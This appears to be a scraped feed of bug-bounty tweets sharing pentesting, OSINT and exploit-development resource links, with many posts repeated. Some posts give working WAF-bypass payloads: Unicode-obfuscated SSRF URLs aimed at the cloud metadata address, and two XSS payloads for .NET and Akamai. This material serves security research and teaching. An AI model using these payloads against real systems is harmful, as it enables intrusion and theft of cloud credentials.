Account takeover
https://t.co/YCK3GB5sJk
https://t.co/eRlkj3n6w2
https://t.co/tuQ3xEpIYc
https://t.co/vApKQSS7Ru
https://t.co/7l7wxb9btx
https://t.co/ETHFuyLd1v
https://t.co/z4FmmyO8xy
https://t.co/5EYYOudexQ
https://t.co/KBYLYDvon3
https://t.co/uim3l7JKir
#bugbounty
https://t.co/YCK3GB5sJk
https://t.co/eRlkj3n6w2
https://t.co/tuQ3xEpIYc
https://t.co/vApKQSS7Ru
https://t.co/7l7wxb9btx
https://t.co/ETHFuyLd1v
https://t.co/z4FmmyO8xy
https://t.co/5EYYOudexQ
https://t.co/KBYLYDvon3
https://t.co/uim3l7JKir
#bugbounty
Medium
Got *Bounty* with Account takeover (ATO ) Unicode-Case Mapping Collision !
Hey hunters ! Recently I discovered a Unicode-Case Mapping Collision vulnerability on a private program.
Top #OSINT tools I used last project:
SEcraper - scrape many search engines at once vs query or keyword
https://github.com/zerobyte-id/SEcraper
Spiderfoot
https://spiderfoot.net
http://OSINT.link
Cheat Sheet
https://inteltechniques.com/JE/OSINT_Packet_2019.pdf
Quick Cloudflare bypass
http://crimeflare.org:82/cfs.html
SEcraper - scrape many search engines at once vs query or keyword
https://github.com/zerobyte-id/SEcraper
Spiderfoot
https://spiderfoot.net
http://OSINT.link
Cheat Sheet
https://inteltechniques.com/JE/OSINT_Packet_2019.pdf
Quick Cloudflare bypass
http://crimeflare.org:82/cfs.html
GitHub
GitHub - zerobyte-id/SEcraper: Search engine scraper tool with BASH script.
Search engine scraper tool with BASH script. Contribute to zerobyte-id/SEcraper development by creating an account on GitHub.
SSRF's to bypass WAF
http://⑯⑨。②⑤④。⑯⑨。②⑤④/
http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/
http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/
http://②⑧⑤②⓪③⑨①⑥⑥:80/
http://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/
http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥
http://⑯⑨。②⑤④。⑯⑨。②⑤④/
http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/
http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/
http://②⑧⑤②⓪③⑨①⑥⑥:80/
http://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/
http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥
#bugbountytip The Request.queryString error in .NET avoids you to get XSS? Try the %uff1cscript%uff1ealert(‘XSS’);%uff1c/script%uff1e payload ;)
5 Subdomain Takeover #ProTips.pdf:
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/7-part-100-article/new_articles/5%20Subdomain%20Takeover%20%23ProTips.pdf
Finding the Balance Between Speed & Accuracy During an Internet-wide Port Scanning.pdf:
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/2-part-100-article/Finding%20the%20Balance%20Between%20Speed%20&%20Accuracy%20During%20an%20Internet-wide%20Port%20Scanning.pdf
Phishing With a Rogue Wi-Fi Access Point.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/7-part-100-article/new_articles/Phishing%20With%20a%20Rogue%20Wi-Fi%20Access%20Point.pdf
#bugbountytip #Hacking #OSINT #Pentest
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/7-part-100-article/new_articles/5%20Subdomain%20Takeover%20%23ProTips.pdf
Finding the Balance Between Speed & Accuracy During an Internet-wide Port Scanning.pdf:
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/2-part-100-article/Finding%20the%20Balance%20Between%20Speed%20&%20Accuracy%20During%20an%20Internet-wide%20Port%20Scanning.pdf
Phishing With a Rogue Wi-Fi Access Point.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/7-part-100-article/new_articles/Phishing%20With%20a%20Rogue%20Wi-Fi%20Access%20Point.pdf
#bugbountytip #Hacking #OSINT #Pentest
GitHub
blaCCkHatHacEEkr/PENTESTING-BIBLE
This repository was created and developed by Ammar Amer @cry__pto Only. Updates to this repository will continue to arrive until the number of links reaches 10000 links & 10000 pdf files .L...
A good way to bypass the Akamai WAF by exploiting a redirect-based XSS is with the following payload:
javascript:new%20Function`al\ert\`1\``;
You can also obfuscate it using HTML entities
#BugBounty
javascript:new%20Function`al\ert\`1\``;
You can also obfuscate it using HTML entities
#BugBounty
Social Distancing Survival Guide
Learn...
Reverse Engineering:
https://github.com/tylerha97/awesome-reversing
Reverse Engineering Malware:
https://malwareunicorn.org/workshops/re101.html#0
https://malwareunicorn.org/workshops/re102.html#0
Web Hacking:
https://portswigger.net/web-security
https://github.com/infoslack/awesome-web-hacking/blob/master/README.md
Exploit Development:
https://github.com/FabioBaroni/awesome-exploit-development/blob/master/README.md
Learn...
Reverse Engineering:
https://github.com/tylerha97/awesome-reversing
Reverse Engineering Malware:
https://malwareunicorn.org/workshops/re101.html#0
https://malwareunicorn.org/workshops/re102.html#0
Web Hacking:
https://portswigger.net/web-security
https://github.com/infoslack/awesome-web-hacking/blob/master/README.md
Exploit Development:
https://github.com/FabioBaroni/awesome-exploit-development/blob/master/README.md
GitHub
GitHub - tylerha97/awesome-reversing: A curated list of awesome reversing resources
A curated list of awesome reversing resources. Contribute to tylerha97/awesome-reversing development by creating an account on GitHub.
APT Lifecycle:
https://azeria-labs.com/advanced-persistent-threat/
Arm Assembly:
https://azeria-labs.com/writing-arm-assembly-part-1/
Arm32 Shellcoding:
https://azeria-labs.com/writing-arm-shellcode/
https://azeria-labs.com/tcp-reverse-shell-in-assembly-arm-32-bit/
Heap Exploitaiton:
https://azeria-labs.com/heap-exploit-development-part-1/
https://azeria-labs.com/heap-overflows-and-the-ios-kernel-heap/
https://azeria-labs.com/grooming-the-ios-kernel-heap/
https://azeria-labs.com/advanced-persistent-threat/
Arm Assembly:
https://azeria-labs.com/writing-arm-assembly-part-1/
Arm32 Shellcoding:
https://azeria-labs.com/writing-arm-shellcode/
https://azeria-labs.com/tcp-reverse-shell-in-assembly-arm-32-bit/
Heap Exploitaiton:
https://azeria-labs.com/heap-exploit-development-part-1/
https://azeria-labs.com/heap-overflows-and-the-ios-kernel-heap/
https://azeria-labs.com/grooming-the-ios-kernel-heap/
Azeria-Labs
Advanced Persistent Threat
Pentesting IoT devices
Part 1: https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html
Part 2: https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html
Books and resources: https://github.com/V33RU/IoTSecurity101/blob/master/README.md
Part 1: https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html
Part 2: https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html
Books and resources: https://github.com/V33RU/IoTSecurity101/blob/master/README.md
Mindedsecurity
Pentesting IoT devices (Part 1: Static Analysis)
Introduction Intelligent dishwashers, smart factories, connected sensors and Wi-Fi fridges, these are only a few examples of everyday ...